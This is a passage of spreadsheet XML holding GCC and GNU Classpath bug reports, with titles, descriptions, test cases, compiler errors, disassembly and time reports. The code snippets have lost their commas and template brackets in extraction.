extern void bcopy (const void * void * size_t)
extern int memcmp (const void * const void * size_t)
char y[64] = foXXXrfoobar
int
main ()
{
  bcopy (y + 1 y + 2 6)
  if (memcmp (y fooXXXrfobar 13))
    abort ()
  return 0
}
aborts with -O1 on i686-pc-linux-gnu for revision 119302.
If the resent changes of builtins.c in r119292 and r119294 are
reverted the errors go away.</t>
  </si>
  <si>
    <t>GCC-19271</t>
  </si>
  <si>
    <t>ICE on a = transpose(a) for character array</t>
  </si>
  <si>
    <t>This may be related to PR 19017.
$ cat reshape-char.f90
program main
  character(len=1) dimension(22) :: ab
  a = reshape((/'a' 'b' 'c' 'd'/) shape(a))
  b = transpose(a)           ! This works
  a = transpose(a)           ! This bombs
  print *a
end program main
$ gfortran reshape-char.f90
reshape-char.f90: In function 'MAIN__':
reshape-char.f90:4: internal compiler error: in gfc_trans_scalar_assign at
fortran/trans-expr.c:2006
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ gfortran -v
Using built-in specs.
Configured with: ../gcc-4.0-20050102/configure --prefix=/home/zfkts
--enable-languages=cc++f95
Thread model: posix
gcc version 4.0.0 20050102 (experimental)
$ gfortran -dumpmachine
ia64-unknown-linux-gnu</t>
  </si>
  <si>
    <t>GCC-44539</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: verify_ssa failed: type mismatch between an SSA_NAME and its symbol</t>
  </si>
  <si>
    <t>Command line:
$ gcc -O[12] -ftracer -freorder-blocks testcase.c
It doesn't crash when -fno-ipa-pure-const is supplied.
Compiler output:
$ gcc -O1 -ftracer -freorder-blocks testcase.c
testcase.c: In function 'foo':
testcase.c:21:6: error: type mismatch between an SSA_NAME and its symbol
testcase.c:21:6: error: in statement
# .MEM_5 = VDEF 
noret1 ()
testcase.c:21:6: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r160687 - crash (+rtldf checking)
r160527 - crash (+rtldf checking)
r159696 - OK</t>
  </si>
  <si>
    <t>GCC-5002</t>
  </si>
  <si>
    <t>Interesting ICE on sparc-sun-solaris2.8 on normal code</t>
  </si>
  <si>
    <t>This code was hand-written not machine-generated.
For some reason cc1 ran for over 11 minutes before I killed
it when originally running gcc on this file.
banach-23% /pkgs/gcc-2.96/lib/gcc-lib/sparc-sun-solaris2.8/3.1/cc1 -m64 -fPIC -O1 -mcpu=ultrasparc -mtune=ultrasparc -fno-math-errno -fno-strict-aliasing -fomit-frame-pointer -fschedule-insns2 -fcall-used-g4 -fcall-used-g5 -fcall-used-g6 -fcall-used-g7 setup.i
 ___raise_interrupt
setup.c: In function `___raise_interrupt':
setup.c:96: unrecognizable insn:
(insn 13 12 15 (set (reg:DI 110)
        (lo_sum:DI (reg:DI 110)
            (unspec:DI[ 
                    (symbol_ref:SI (___gstate))
                ]  0))) -1 (insn_list 12 (nil))
    (nil))
setup.c:96: Internal compiler error in extract_insn at recog.c:2128
Release:
gcc version 3.1 20011203 (experimental)
Environment:
sparc-sun-solaris2.8 using sun as
How-To-Repeat:
run the above command on
http://www.math.purdue.edu/~lucier/setup.i.gz</t>
  </si>
  <si>
    <t>GCC-77265</t>
  </si>
  <si>
    <t>Casting an extended precision long double inf to __float128 results in nan</t>
  </si>
  <si>
    <t>Created attachment 39463
Demonstrates the bug that I've described
Hi
First up ... I've nominated that this is A problem with the C compiler front end.
My apologies if that assessment is incorrect.
Attached is the demo program (bug492.c) which I've built on Ubuntu-16.04LTS (gcc-5.4.0) with the command:
$ gcc -Wall -Wextra -fno-strict-aliasing -fwrapv -o bug492 bug492.c -lquadmath
The output of that program is:
inf inf
Looks like we have a NaN instead of Inf
inf nan
and I take it that demonstrates that an extended precision (80-bit) long double +infinity when cast to a __float128 is transformed into a NaN.
I originally reported this as a mingw-w64 bug (over a year ago) at:
https://sourceforge.net/p/mingw-w64/bugs/479/
It's only recently that I've encountered the same behaviour with gcc on linux.
(I think this might be because I generally use more modern versions of gcc on Windows than I do on linux.)
I guess it might be considered as a somewhat minor quibble ... but it has actually become quite a PITA for me.
Can something be done ? ... or do I just need to keep implementing workarounds ?
Thank you all for your excellent work.
Cheers
Rob</t>
  </si>
  <si>
    <t>sisyphus1</t>
  </si>
  <si>
    <t>GCC-79051</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/attr-alloc_size-4.c  (test for warnings line 140)</t>
  </si>
  <si>
    <t>As mentioned in bug 78775 comment 8 on powerpc64 and powerpc64le the gcc.dg/attr-alloc_size-4.c test fails the assertion on line 140 (an expected warning is not issued).  Interestingly the comment shows excess errors but my run does not.  All I get on both is
FAIL: gcc.dg/attr-alloc_size-4.c  (test for warnings line 140)
		=== gcc Summary ===
# of expected passes		25
# of unexpected failures	1
I'm also having trouble isolating the failure into a small test case independent of the attr-alloc_size-4.c test.</t>
  </si>
  <si>
    <t>GCC-34272</t>
  </si>
  <si>
    <t>ICE with invalid template specialization</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since at least GCC 2.95.3:
===================================
template struct A {}
template struct A
{
  template void foo()
}
void bar()
{
  A a
  a.foo()
}
===================================
bug.cc:3: error: template parameters not used in partial specialization:
bug.cc:3: error:         ''
bug.cc: In function 'void bar()':
bug.cc:11: internal compiler error: in retrieve_specialization at cp/pt.c:899
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-80293</t>
  </si>
  <si>
    <t>[6/7 Regression] unnecessary code at -O2 (-O1 is fine)</t>
  </si>
  <si>
    <t>Created attachment 41110
repro.cpp
Apologies for the poor summary I really can't think of a good way to describe this.
I'm using a couple of functions to conduit through an `std::array` representation of variable's memory (similar to type-punning through `std::memcpy`) the compiler even in -O2 is emitting a lot of unnecessary garbage.
---
// g++ repro.cpp -c -o repro.o -std=gnu++11 -O2 -save-temps
#include 
#include 
#include 
#include 
// Return a copy of the underlying memory of an arbitrary value.
template &lt;
    typename T
    typename = typename std::enable_if::value&gt;::type
&gt;
auto getMem(
    T const &amp; value
) -&gt; std::array {
    auto ret = std::array{}
    std::memcpy(ret.data() 
    return ret
}
template &lt;
    typename T
    typename = typename std::enable_if::value&gt;::type
&gt;
auto fromMem(
    std::array const &amp; buf
) -&gt; T {
    auto ret = T{}
    std::memcpy(
    return ret
}
double foo1(std::uint64_t arg) {
    return fromMem(getMem(arg))
}
double foo2(std::uint64_t arg) {
    return *reinterpret_cast(
}
double foo3(std::uint64_t arg) {
    double ret
    std::memcpy(
    return ret
}
---
In GCC 5.4 and older as well as all versions of clang that I tested all three `foo*` functions emit identical and extremely short code. But in GCC 6.1 and newer `foo1` emits a load of extra instructions *only when -O2 or above is used*.
---
Disassembly of section .text:
0000000000000000 :
   0:	48 83 ec 28          	sub    $0x28%rsp
   4:	64 48 8b 04 25 28 00 	mov    %fs:0x28%rax
   b:	00 00 
   d:	48 89 44 24 18       	mov    %rax0x18(%rsp)
  12:	31 c0                	xor    %eax%eax
  14:	89 f8                	mov    %edi%eax
  16:	66 c1 e8 08          	shr    $0x8%ax
  1a:	89 c1                	mov    %eax%ecx
  1c:	89 f8                	mov    %edi%eax
  1e:	c1 e8 18             	shr    $0x18%eax
  21:	89 c2                	mov    %eax%edx
  23:	31 c0                	xor    %eax%eax
  25:	40 88 f8             	mov    %dil%al
  28:	0f b6 d2             	movzbl %dl%edx
  2b:	88 cc                	mov    %cl%ah
  2d:	48 89 f9             	mov    %rdi%rcx
  30:	48 c1 e2 18          	shl    $0x18%rdx
  34:	81 e1 00 00 ff 00    	and    $0xff0000%ecx
  3a:	48 25 ff ff 00 ff    	and    $0xffffffffff00ffff%rax
  40:	48 09 c8             	or     %rcx%rax
  43:	48 b9 ff ff ff 00 ff 	movabs $0xffffffff00ffffff%rcx
  4a:	ff ff ff 
  4d:	48 21 c8             	and    %rcx%rax
  50:	48 b9 ff ff ff ff 00 	movabs $0xffffff00ffffffff%rcx
  57:	ff ff ff 
  5a:	48 09 d0             	or     %rdx%rax
  5d:	48 ba 00 00 00 00 ff 	movabs $0xff00000000%rdx
  64:	00 00 00 
  67:	48 21 fa             	and    %rdi%rdx
  6a:	48 21 c8             	and    %rcx%rax
  6d:	48 b9 ff ff ff ff ff 	movabs $0xffff00ffffffffff%rcx
  74:	00 ff ff 
  77:	48 09 d0             	or     %rdx%rax
  7a:	48 ba 00 00 00 00 00 	movabs $0xff0000000000%rdx
  81:	ff 00 00 
  84:	48 21 fa             	and    %rdi%rdx
  87:	48 21 c8             	and    %rcx%rax
  8a:	48 b9 ff ff ff ff ff 	movabs $0xff00ffffffffffff%rcx
  91:	ff 00 ff 
  94:	48 09 d0             	or     %rdx%rax
  97:	48 ba 00 00 00 00 00 	movabs $0xff000000000000%rdx
  9e:	00 ff 00 
  a1:	48 21 fa             	and    %rdi%rdx
  a4:	48 c1 ef 38          	shr    $0x38%rdi
  a8:	48 21 c8             	and    %rcx%rax
  ab:	48 c1 e7 38          	shl    $0x38%rdi
  af:	48 09 d0             	or     %rdx%rax
  b2:	48 89 fa             	mov    %rdi%rdx
  b5:	48 bf ff ff ff ff ff 	movabs $0xffffffffffffff%rdi
  bc:	ff ff 00 
  bf:	48 21 c7             	and    %rax%rdi
  c2:	48 09 d7             	or     %rdx%rdi
  c5:	48 8b 44 24 18       	mov    0x18(%rsp)%rax
  ca:	64 48 33 04 25 28 00 	xor    %fs:0x28%rax
  d1:	00 00 
  d3:	48 89 7c 24 08       	mov    %rdi0x8(%rsp)
  d8:	f2 0f 10 44 24 08    	movsd  0x8(%rsp)%xmm0
  de:	75 05                	jne    e5 
  e0:	48 83 c4 28          	add    $0x28%rsp
  e4:	c3                   	retq   
  e5:	e8 00 00 00 00       	callq  ea 
  ea:	66 0f 1f 44 00 00    	nopw   0x0(%rax%rax1)
00000000000000f0 :
  f0:	48 89 7c 24 f8       	mov    %rdi-0x8(%rsp)
  f5:	f2 0f 10 44 24 f8    	movsd  -0x8(%rsp)%xmm0
  fb:	c3                   	retq   
  fc:	0f 1f 40 00          	nopl   0x0(%rax)
0000000000000100 :
 100:	48 89 7c 24 f8       	mov    %rdi-0x8(%rsp)
 105:	f2 0f 10 44 24 f8    	movsd  -0x8(%rsp)%xmm0
 10b:	c3                   	retq   
---
Tested this on g++ (Ubuntu 6.2.0-5ubuntu12) 6.2.0 20161005 x86-64. Also verified many versions with godbolt.org.</t>
  </si>
  <si>
    <t>GCC-50594</t>
  </si>
  <si>
    <t>Option -fwhole-program discards replaced new operator for std::string</t>
  </si>
  <si>
    <t>The following program fails to output the messages in the replaced allocation operators but *only* during the string allocation *and* when the option `-fwhole-program` is present. (Tested on 4.6.1 and 4.4.3.) That is the program behaves differently when compiles with the following two commands:
  g++ -std=c++0x -o prog prog.cpp
  g++ -std=c++0x -o prog prog.cpp -fwhole-program
Note that the allocation used by the map is always done correctly.
Program code:
#include 
#include 
#include 
#include 
#include 
void * operator new(std::size_t n) throw(std::bad_alloc)
{
  void * const p = std::malloc(n)
  if (p == NULL) throw std::bad_alloc()
  std::cerr &lt;&lt; new() requests  &lt;&lt; n &lt;&lt;  bytes allocated at  &lt;&lt; p &lt;&lt; .\n
  return p
}
void operator delete(void * p) throw()
{
  std::cerr &lt;&lt; delete() at  &lt;&lt; p &lt;&lt; .\n
  std::free(p)
}
int main()
{
  std::string s = Hello World.
  std::map m { { 0 1 } }
  return s.length()
}</t>
  </si>
  <si>
    <t>z0sh</t>
  </si>
  <si>
    <t>GCC-58186</t>
  </si>
  <si>
    <t>LTO profiledbootstrap fails in stage feedback for fortran/frontend-passes.c with edge ... has no corresponding call_stmt</t>
  </si>
  <si>
    <t>LTO profiled bootstrap of gcc configured --with-build-config=bootstrap-lto --enable-languages=cc++fortran fails with:
/home/uros/gcc-svn/trunk/gcc/fortran/frontend-passes.c:2149:1: error: edge gfc_code_walker(gfc_code** int (*)(gfc_code** int* void*) int (*)(gfc_expr** int* void*) void*)-&gt;doloop_code(gfc_code** int* void*) has no corresponding call_stmt
 }
 ^
# .MEM_35 = VDEF 
result_36 = codefn_33(D) (c_1 
_Z15gfc_code_walkerPP8gfc_codePFiS1_PiPvEPFiPP8gfc_exprS2_S3_ES3_/155 (gfc_code_walker(gfc_code** int (*)(gfc_code** int* void*) int (*)(gfc_expr** int* void*) void*)) @0x7f4e4cf0aab0
  Type: function definition analyzed
  Visibility: externally_visible public
  References: _ZL16in_omp_workshare/116 (read)_ZL12doloop_level/120 (read)_ZL12doloop_level/120 (write)_ZL12forall_level/115 (read)_ZL12forall_level/115 (write)_ZL16in_omp_workshare/116 (write)_ZL16in_omp_workshare/116 (write)_ZL12forall_level/115 (read)_ZL12forall_level/115 (write)_ZL12doloop_level/120 (read)_ZL12doloop_level/120 (write)_ZL16in_omp_workshare/116 (write)_ZL11doloop_codePP8gfc_codePiPv/151 (addr) (speculative)
  Referring: 
  Availability: available
  Profile id: 839983705
  Function flags: executed 100x body
  Called by: _Z14gfc_run_passesP13gfc_namespace/122 (100x) (1.00 per call) _ZL18optimize_namespaceP13gfc_namespace/136 (1.00 per call) _ZL18optimize_namespaceP13gfc_namespace/136 (1.00 per call) _ZL18optimize_namespaceP13gfc_namespace/136 (1.00 per call) _ZL18optimize_namespaceP13gfc_namespace/136 (1.00 per call) _ZL18optimize_reductionP13gfc_namespace/137 (1.00 per call) _Z15gfc_code_walkerPP8gfc_codePFiS1_PiPvEPFiPP8gfc_exprS2_S3_ES3_/155 _Z15gfc_code_walkerPP8gfc_codePFiS1_PiPvEPFiPP8gfc_exprS2_S3_ES3_/155 _Z15gfc_code_walkerPP8gfc_codePFiS1_PiPvEPFiPP8gfc_exprS2_S3_ES3_/155 
  Calls: _ZL11doloop_codePP8gfc_codePiPv/151 (speculative) (26x) (0.26 per call) _Z15gfc_code_walkerPP8gfc_codePFiS1_PiPvEPFiPP8gfc_exprS2_S3_ES3_/155 _Z15gfc_expr_walkerPP8gfc_exprPFiS1_PiPvES3_/154 _Z15gfc_expr_walkerPP8gfc_exprPFiS1_PiPvES3_/154 _Z15gfc_expr_walkerPP8gfc_exprPFiS1_PiPvES3_/154 (26x) (0.26 per call) _Z15gfc_expr_walkerPP8gfc_exprPFiS1_PiPvES3_/154 (26x) (0.26 per call) _Z15gfc_expr_walkerPP8gfc_exprPFiS1_PiPvES3_/154 (26x) (0.26 per call) _Z15gfc_expr_walkerPP8gfc_exprPFiS1_PiPvES3_/154 (26x) (0.26 per call)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code_walkerPP8gfc_codePFiS1_PiPvEPFiPP8gfc_exprS2_S3_ES3_/155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expr_walkerPP8gfc_exprPFiS1_PiPvES3_/154 _Z15gfc_code_walkerPP8gfc_codePFiS1_PiPvEPFiPP8gfc_exprS2_S3_ES3_/155 
  Has 1 outgoing edges for indirect calls.
/home/uros/gcc-svn/trunk/gcc/fortran/frontend-passes.c:2149:1: internal compiler error: verify_cgraph_node failed
0xa0a9d5 verify_cgraph_node(cgraph_node*)
	/home/uros/gcc-svn/trunk/gcc/cgraph.c:2933
0xa000c6 verify_symtab_node
	/home/uros/gcc-svn/trunk/gcc/symtab.c:763
0xa000c6 verify_symtab()
	/home/uros/gcc-svn/trunk/gcc/symtab.c:780
0xd0b667 symtab_remove_unreachable_nodes(bool _IO_FILE*)
	/home/uros/gcc-svn/trunk/gcc/ipa.c:224
0xe2a406 execute_todo
	/home/uros/gcc-svn/trunk/gcc/passes.c:1858
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
gmake[3]: *** [fortran/frontend-passes.o] Error 1
gmake[3]: *** Waiting for unfinished jobs....
rm gcov.pod fsf-funding.pod cpp.pod gfdl.pod gcc.pod gfortran.pod
gmake[3]: Leaving directory `/ssd/uros/gcc-build-profiled/gcc'
gmake[2]: *** [all-stagefeedback-gcc] Error 2
gmake[2]: Leaving directory `/ssd/uros/gcc-build-profiled'
gmake[1]: *** [stagefeedback-bubble] Error 2
gmake[1]: Leaving directory `/ssd/uros/gcc-build-profiled'
gmake: *** [profiledbootstrap] Error 2
The failure is similar to [1] in cp/pt.c.
[1] http://gcc.gnu.org/ml/gcc-regression/2013-08/msg00273.html</t>
  </si>
  <si>
    <t>GCC-3619</t>
  </si>
  <si>
    <t>GCC 3.0 C++ backwards compatibility bug?</t>
  </si>
  <si>
    <t xml:space="preserve">Compiling a file with this single line of code:
#include 
does not work but leads to error messages.
I'm aware that the file strstream is deprecated but from
the comments in this file and the ANSI standard it looks as
it should still be usable in order to remain backwards
compatible.
Release:
gcc version 3.1 20010525 (experimental)
Environment:
System: Linux duplo 2.4.6 #1 SMP Wed Jul 4 13:42:19 MEST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /home/us/egcs/gcc/configure --prefix=/opt/egcs --enable-languages=c++ --enable-shared --enable-threads
How-To-Repeat:
Just compile a one-line program consisting of this line:
#include </t>
  </si>
  <si>
    <t>us</t>
  </si>
  <si>
    <t>GCC-57708</t>
  </si>
  <si>
    <t>[4.8 regression] function clobbers callee saved register on ARM</t>
  </si>
  <si>
    <t>Compile the attached code with -O3 -mcpu=cortex-a15 -marm on ARM EABI (the bug happens with hardfp or without). The functions html_h3 html_h4 html_h5 html_h6 clobber the register r5 and do not save it. They save only r4. The bug is present in gcc-4.8 and gcc-4.8.1</t>
  </si>
  <si>
    <t>mikulas</t>
  </si>
  <si>
    <t>GCC-35634</t>
  </si>
  <si>
    <t>[4.7 Regression] operand of pre-/postin-/decrement not promoted</t>
  </si>
  <si>
    <t>/* The next program is aborted with avr-gcc 4.1.2 4.2.3 4.3.0:
      result of char promotion comes out of CHAR_MIN/MAX.
   Options: -W -Wall -Os
   Know to work:
      3.3.6 3.4.6 - good code
      4.0.4 - correct but not the best
      4.1.2 4.2.3 4.3.0 - without optimization only
 */
#include 
void abort (void)
void exit (int)
void foo (int i)
{
    static int n
    if (i  CHAR_MAX)
        abort ()
    if (++n &gt; 1000)
        exit (0)
}
int main ()
{
    char c
    for (c = 0  c++) foo (c)
}</t>
  </si>
  <si>
    <t>dmixm</t>
  </si>
  <si>
    <t>GCC-15052</t>
  </si>
  <si>
    <t>gcc frontend accepts mismatched function declaration/defintion</t>
  </si>
  <si>
    <t>The frontend accepts the mismatched function declaration and definitions in the 
case of non pointer return types and a type qualifier appears in one but not the
other.An example code is given below  which gcc readily accepts 
int foo()
const int  foo()
{
  return 0
}</t>
  </si>
  <si>
    <t>tjruwase</t>
  </si>
  <si>
    <t>GCC-71181</t>
  </si>
  <si>
    <t>Reserving in unordered_map doesn't reserve enough</t>
  </si>
  <si>
    <t>Code:
#include 
#include 
using namespace std
int main() {
	std::unordered_map x
	x.reserve(97)
	std::cout &lt;&lt; x.bucket_count() &lt;&lt; std::endl
	for (int i = 0 i &lt; 97 ++i) {
		x[i] = 1
	}
	std::cout &lt;&lt; x.bucket_count() &lt;&lt; std::endl
}
it prints for me
97
199
It doesn't contradict my reading of the Standard but still counterintuitive.
If user reserves smth he would expect no rehashes
Note probably any prime will do.
Generally for each as far as I understand rehashing happens when 
new_size &gt;= buckets_count (multiplied by load_factor which is 1)
I propose changing &gt;= to &gt;</t>
  </si>
  <si>
    <t>riad93</t>
  </si>
  <si>
    <t>GCC-12739</t>
  </si>
  <si>
    <t>[3.4 Regression] gcj emits dead bytecode</t>
  </si>
  <si>
    <t>For the test case:
class T {
  int t() { try { return 0 } finally { } }
}
Compare the bytecode created with 3.2.2:
Method name:t Signature: 6=()int
Attribute Code length:26 max_stack:1 max_locals:1 code_length:2
  0: iconst_0
  1: ireturn
vs. current CVS:
Method name:t Signature: 6=()int
Attribute Code length:48 max_stack:2 max_locals:4 code_length:16
  0: iconst_0
  1: istore_1
  2: jsr 13
  5: iload_1
  6: ireturn
  7: astore_3
  8: jsr 13
 11: aload_3
 12: athrow
 13: astore_2
 14: ret 2
Exceptions (count: 1):
  start: 0 end: 7 handler: 7 type: 0 /* finally */
Probably caused by:
2003-09-03  Jeff Sturm  
        * parse.y: Include cgraph.h.
        (block): Don't special-case empty block production.</t>
  </si>
  <si>
    <t>CLASSPATH-22873</t>
  </si>
  <si>
    <t>java.util.regex.Matcher.group(int) differs from Sun's API</t>
  </si>
  <si>
    <t xml:space="preserve">
According to Sun's API documentation java.util.regex.Matcher.group(int) returns null if the specified group didn't match. This isn't mentioned in the documentation of the respective method in Classpath 0.13. Further the implementation is to return gnu.regexp.REMatch.toString(group) which is an empty string in this situation.
There is also a related internal inconsistency in Classpath resulting from this implementation because REMatch.toString(int) doesn't throw the exception that Match.group(int) promises in case the group doesn't exist in the pattern.
Attached is a test program that prints two OKs on Sun's JDK
1.5.0 and two shoulds on Kaffe 1.1.4 and Sablevm 1.1.9.
</t>
  </si>
  <si>
    <t>GCC-8932</t>
  </si>
  <si>
    <t>g++ 3.2 error parsing a scoped friend declaration</t>
  </si>
  <si>
    <t>This is still failing in 3.2. The problem was first reported against 2.95.2. It was analyzed by Martin v. Loewis as a known parser limitation but AFAIK we never entered in GNATS.
Regards
Martin
$ cat t.cpp g++ --version g++ -c t.cpp echo $?
template 
struct A { }
template 
struct B
{
    friend class ::A
}
g++ (GCC) 3.2
Copyright (C) 2002 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
t.cpp:9: parse error before `' token
1
Release:
3.2</t>
  </si>
  <si>
    <t>GCC-63480</t>
  </si>
  <si>
    <t>-Wmissing-field-initializers should not warn about intentionally empty initializers (or that should be a separate option)</t>
  </si>
  <si>
    <t>-Wmissing-field-initializers warns if a positional initializer does not initialize all fields.  However it does so even if the initializer is {} which is a common idiom to initialize the entire structure to zero.  Please consider not warning in that specific case.  If anyone actually *wants* GCC to warn in that case perhaps that could go in a separate -Wempty-initializer.
Alternatively if people *really* want -Wmissing-field-initializers to warn about {} could we have some other warning option that only warns about missing field initializers with non-empty initializers?</t>
  </si>
  <si>
    <t>GCC-68278</t>
  </si>
  <si>
    <t>internal compiler error with C++14 polymorphic lambda and type alias</t>
  </si>
  <si>
    <t>Created attachment 36682
C++14 file which produces the internal compiler error
The C++14 code below produces an internal compiler error in tsubst_decl at cp/pt.c:10836 when compiled using:
g++ -std=c++14 poly_type_lambda_bug.cpp
with GCC 5.2.0. I'm using Ubuntu 15.04 (vivid). It compilers and runs with clang version 3.8.0 (trunk 252425).
int main(int argc char *argv[])
{
  auto f = []() { return 1 }
  auto q = [=](auto g) {
    using type = decltype(g(f()))
  }
  q([](int x){ return x })
  return 0
}</t>
  </si>
  <si>
    <t>GCC-67759</t>
  </si>
  <si>
    <t>[4.9 only] Missing warning makes pointer from integer without a cast after multiline assert</t>
  </si>
  <si>
    <t>Created attachment 36413
Stripped down failing c source.
Hello
when compiling the attached source i do not get the makes pointer from integer without a cast warning.
I see this behavior with 
 - gcc (GCC) 4.9.2 20150212 (Red Hat 4.9.2-6) on fedora 21.
 - gcc (GCC) 4.9.0
but NOT with
 - gcc (GCC) 4.7.2
 - gcc (SUSE Linux) 4.5.1 20101208
To miss the warning compile with:
gcc -Wall -W --save-temps -c missing_warning.c -o missing_warning.o
Without the --save-temps option the warning appears.
Without the newline in the assert(1) the warning also appears!
Maybe this is related to or a duplicate of
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=60100
and/or
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=57201
Regards
Jens</t>
  </si>
  <si>
    <t>jens-gcc-bugzilla</t>
  </si>
  <si>
    <t>GCC-49700</t>
  </si>
  <si>
    <t>LTO compile time hog</t>
  </si>
  <si>
    <t>Using LTO a CP2K compile can take several hours and a lot of memory. I have been able to extract the following time report but what is the best way to make a testcase ? -save-temps yielded the cp2k.sopt.ltrans29.ltrans.o file but is anything more needed ?
 gfortran @/dev/shm/vondele/ccGyXn6S.args
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/data03/vondele/gnu/gcc_trunk/install/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc/configure --prefix=/data03/vondele/gnu/gcc_trunk/install --enable-languages=cc++fortran --disable-multilib --enable-plugins --enable-cloog-backend=isl --with-ppl=/data03/vondele/gnu/ppl-0.11/install --with-cloog=/data03/vondele/gnu/cloog-0.16.1/install/ --with-libelf=/data03/vondele/gnu/libelf-0.8.13/install --with-plugin-ld=ld.gold
Thread model: posix
gcc version 4.7.0 20110709 (experimental) [trunk revision 176072] (GCC)
COLLECT_GCC_OPTIONS='-c' '-v' '-save-temps' '-ftime-report' '-u' 'se-linker-plugin' '-O3' '-march=native' '-funroll-loops' '-ffast-math' '-ffree-form' '-D' '__GFORTRAN' '-D' '__FFTSG' '-D' '__FFTW3' '-D' '__LIBINT' '-I' '/ext/software/64/gfortran-suite/include' '-D' '__COMPILE_ARCH=gfortran-test13' '-D' '__COMPILE_DATE=Sun Jul 10 14:22:33 CEST 2011' '-D' '__COMPILE_HOST=pcihopt3' '-D' '__COMPILE_LASTCVS=/qs_scf.F/1.527/Sat Jul  9 07:18:08 2011//' '-L/users/vondele/LAPACK/' '-L/ext/software/64/gfortran-suite/lib' '-shared-libgcc' '-dumpdir' '/data03/vondele/cp2k_gcc/cp2k/makefiles/../exe/gfortran-test13/' '-dumpbase' 'cp2k.sopt.ltrans29' '-fltrans' '-o' 'cp2k.sopt.ltrans29.ltrans.o'
 /data03/vondele/gnu/gcc_trunk/install/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto1 -march=amdfam10 -mcx16 -msahf -mno-movbe -mno-aes -mno-pclmul -mpopcnt -mabm -mno-lwp -mno-fma -mno-fma4 -mno-xop -mno-bmi -mno-tbm -mno-avx -mno-sse4.2 -mno-sse4.1 --param l1-cache-size=64 --param l1-cache-line-size=64 --param l2-cache-size=512 -mtune=amdfam10 -quiet -dumpdir /data03/vondele/cp2k_gcc/cp2k/makefiles/../exe/gfortran-test13/ -dumpbase cp2k.sopt.ltrans29 -auxbase-strip cp2k.sopt.ltrans29.ltrans.o -O3 -version -ftime-report -funroll-loops -ffast-math -ffree-form -fltrans @/dev/shm/vondele/ccuRF1W6 -o cp2k.sopt.ltrans29.s
GNU GIMPLE (GCC) version 4.7.0 20110709 (experimental) [trunk revision 176072] (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.7.0 20110709 (experimental) [trunk revision 176072] GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU GIMPLE (GCC) version 4.7.0 20110709 (experimental) [trunk revision 176072] (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.7.0 20110709 (experimental) [trunk revision 176072] GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Execution times (seconds)
 phase setup             :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.02 ( 0%) wall    1250 kB ( 0%) ggc
 phase parsing           :5086.93 (100%) usr   9.45 (100%) sys5213.35 (100%) wall 1072513 kB (100%) ggc
 phase generate          :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall       0 kB ( 0%) ggc
 garbage collection      :   4.16 ( 0%) usr   0.02 ( 0%) sys   4.22 ( 0%) wall       0 kB ( 0%) ggc
 ipa lto gimple in       :   0.13 ( 0%) usr   0.01 ( 0%) sys   0.16 ( 0%) wall   26100 kB ( 2%) ggc
 ipa lto decl in         :   0.86 ( 0%) usr   0.01 ( 0%) sys   0.89 ( 0%) wall    7027 kB ( 1%) ggc
 ipa pure const          :   0.03 ( 0%) usr   0.00 ( 0%) sys   0.03 ( 0%) wall      11 kB ( 0%) ggc
 cfg construction        :   0.62 ( 0%) usr   0.00 ( 0%) sys   0.63 ( 0%) wall    3820 kB ( 0%) ggc
 cfg cleanup             :   2.89 ( 0%) usr   0.00 ( 0%) sys   2.91 ( 0%) wall    4416 kB ( 0%) ggc
 CFG verifier            :  49.95 ( 1%) usr   0.00 ( 0%) sys  50.28 ( 1%) wall       0 kB ( 0%) ggc
 trivially dead code     :   0.88 ( 0%) usr   0.00 ( 0%) sys   0.90 ( 0%) wall       0 kB ( 0%) ggc
 df scan insns           :   0.20 ( 0%) usr   0.00 ( 0%) sys   0.23 ( 0%) wall      20 kB ( 0%) ggc
 df multiple defs        :   0.34 ( 0%) usr   0.00 ( 0%) sys   0.34 ( 0%) wall       0 kB ( 0%) ggc
 df reaching defs        :  60.58 ( 1%) usr   1.10 (12%) sys  62.35 ( 1%) wall       0 kB ( 0%) ggc
 df live regs            :  13.28 ( 0%) usr   0.04 ( 0%) sys  13.56 ( 0%) wall       0 kB ( 0%) ggc
 df live&amp;initialized regs:   5.43 ( 0%) usr   0.00 ( 0%) sys   5.59 ( 0%) wall       0 kB ( 0%) ggc
 df use-def / def-use chains:   1.16 ( 0%) usr   0.01 ( 0%) sys   1.25 ( 0%) wall       0 kB ( 0%) ggc
 df live reg subwords    :   0.47 ( 0%) usr   0.00 ( 0%) sys   0.46 ( 0%) wall       0 kB ( 0%) ggc
 df reg dead/unused notes:   4.22 ( 0%) usr   0.00 ( 0%) sys   4.20 ( 0%) wall    8542 kB ( 1%) ggc
 register information    :   1.72 ( 0%) usr   0.00 ( 0%) sys   1.77 ( 0%) wall       0 kB ( 0%) ggc
 alias analysis          :   2.40 ( 0%) usr   0.00 ( 0%) sys   2.40 ( 0%) wall   29964 kB ( 3%) ggc
 alias stmt walking      :   1.06 ( 0%) usr   0.03 ( 0%) sys   1.11 ( 0%) wall    6438 kB ( 1%) ggc
 register scan           :   0.17 ( 0%) usr   0.00 ( 0%) sys   0.17 ( 0%) wall      35 kB ( 0%) ggc
